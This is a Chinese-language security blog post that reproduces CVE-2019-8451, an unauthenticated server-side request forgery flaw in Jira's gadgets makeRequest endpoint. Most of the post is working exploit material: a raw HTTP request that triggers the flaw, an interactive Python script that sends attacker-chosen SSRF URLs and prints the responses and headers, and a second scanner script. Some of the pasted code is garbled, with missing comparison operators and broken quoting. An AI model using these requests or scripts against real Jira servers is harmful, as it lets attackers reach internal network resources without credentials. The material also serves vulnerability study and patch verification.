標題：Jira未授權SSRF漏洞復現(CVE-2019-8451)

[taibeihacker]

0x00 漏洞背景​

Jira的/plugins/servlet/gadgets/makeRequest資源存在SSRF漏洞，原因在於JiraWhitelist這個類的邏輯缺陷，成功利用此漏洞的遠程攻擊者可以以Jira服務端的身份訪問內網資源。經分析，此漏洞無需任何憑據即可觸發。

0x01 影响范围​

8.4.0
此漏洞是在Jira服務器7.6.0版中引入的，並在7.13.9和8.4.0版中進行了修復

0x02 漏洞复现​

Atlassian JIRAv7.13.0(以該版本為例，該版本存在漏洞)下載地址：

https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe

安裝過程不再描述（按照提示進行安裝，先在官方註冊一個賬號然後拿到一個試用期序列號並進行安裝）。
通過bupsuit進行請求如下，在響應中可以看到成功探測目標系統存在ssrf漏洞：
GET /plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:[email protected] HTTP/1.1
Host: 10.206.1.8:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchangeb;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
X-Atlassian-Token: no-check
Connection: close

0x03 漏洞验证​

其驗證POC如下：
import requests
import sys
# http://http//10.206.1.8:8080/plugin...est?url=http://10.206.1.8:[email protected]/
def ssrf_poc(url, ssrf_url):
if url[-1]=='/':
url=url[:-1]
else:
url=url
vuln_url=url + '/plugins/servlet/gadgets/makeRequest?url=' + url + '@' + ssrf_url
headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'X-Atlassian-Token': 'no-check',
'Connection': 'close'
}
r=requests.get(url=vuln_url, headers=headers)
if r.status_code==200 and 'set-cookie' in r.content:
print '\nSend poc Success!\n'
print 'X-AUSERNAME=%s' % r.headers.get('X-AUSERNAME')
print '\nvuln_url=' + vuln_url + '\n'
print r.content
else:
print 'No Vuln Exit!'
if __name__=='__main__':
while True:
print
ssrf_url=raw_input('SSRF URL: ')
url='http://10.206.1.8:8080' #需要修改成自己的目標jira系統
ssrf_poc(url, ssrf_url)
python CVE-2019-8451.pyhttp://10.206.1.8:8080/

或者：#!/usr/bin/env python3
import argparse
import requests
import re
G, B, R, W, M, C, end='\033[92m', '\033[94m', '\033[91m', '\x1b[37m', '\x1b[35m', '\x1b[36m', '\033[0m'
info=end + W + '[-]' + W
good=end + G + '[+]' + C
bad=end + R + '[' + W + '!' + R + ']'
user_agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36'
def check_version(url):
target=url
response=send_request(target)
print(info + ' Checking for version.' + end)
r1=re.search('[0-9]{1}\.[0-9]{1}\.[0-9]{1}', str(response))
print(info + ' Jira version appears to be: ' + r1.group(0) + end)
v1='8.4.0'
v2=r1.group(0)
if comapre_versions(v1, v2)==False:
print(bad + ' Version seems to indicate it's probably not vulnerable.' + end)
else:
print(good + ' Version seems to indicate it might be vulnerable!' + end)
def comapre_versions(v1, v2):
for i, j in zip(map(int, v1.split('.')), map(int, v2.split('.'))):
if i==j:
continue
return i j
return len(v1.split('.')) len(v2.split('.'))
def check_vuln(url):
target=url + '/plugins/servlet/gadgets/makeRequest?url=' + url + '@example.com/'
response=send_request(target)
print(info + ' Sending SSRF test.' + end)
if ''rc':200' in response and 'Example Domain' in response:
print(good + ' Host appears to be vulnerable! ' + end)
else:
print(bad + ' Host doesn't appear to be vulnerable.' + end)
def send_request(target):
headers={'X-Atlassian-token':'no-check', 'User-Agent':user_agent}
try:
r=requests.get(target, headers=headers)
except Exception as e:
print(bad + ' Problem with request! ' + end)
print(e)
exit(-1)
if (r.status_code !=200):
print(info + ' Something went wrong! ' + end)
if (r.status_code==302):
print(bad + ' Redirected. Try this instead: ' + r.headers['Location'] + end)
else:
print(bad + ' Status: ' + str(r.status_code) + end)
exit(-1)
return(r.text)
if __name__=='__main__':
parser=argparse.ArgumentParser(prog='jira-2019-8451.py', description='For checking if a Jira instance is vunlerable to CVE-2019-8451')
parser.add_argument('-u', '--url', help='URL of the target Jira instance e.g. '-u https://localhost:8080'')
parser.add_argument('-c', '--check', help='Only check the Jira version; doesn't send SSRF attempt', action='store_true')
args=parser.parse_args()
if not args.url:
print(bad + ' Missing parameters ' + end)
parser.print_help()
exit(-1)
url=str(args.url)
print(info + ' Testing ' + url + '.' + end)
if args.check==True:
check_version(url)
exit(0)
else:
check_version(url)
check_vuln(url)
使用方法：pip3 install requests
$ ./jira-2019-8451.py -h
usage: jira-2019-8451.py [-h] [-u URL] [-c]
For checking if a Jira instance is vunlerable to CVE-2019-8451
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL of the target Jira instance e.g. '-u

https://localhost:8080

-c, --check Only check the Jira version; doesn't send SSRF attempt
D:\Python\Python37python C:\Users\Administrator\Desktop\jira-2019-8451.py -u http://10.206.1.8:8080

0x04 修复建议​

升級到8.4.0及以上版本

0x05 参考文献​

https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A

NVD - CVE-2019-8451

nvd.nist.gov

GitHub - jas502n/CVE-2019-8451: Jira未授权SSRF漏洞

Jira未授权SSRF漏洞. Contribute to jas502n/CVE-2019-8451 development by creating an account on GitHub.

github.com

GitHub - h0ffayyy/Jira-CVE-2019-8451: POC to check for Jira instances vulnerable to CVE-2019-8451

POC to check for Jira instances vulnerable to CVE-2019-8451 - h0ffayyy/Jira-CVE-2019-8451

github.com

Loading...

jira.atlassian.com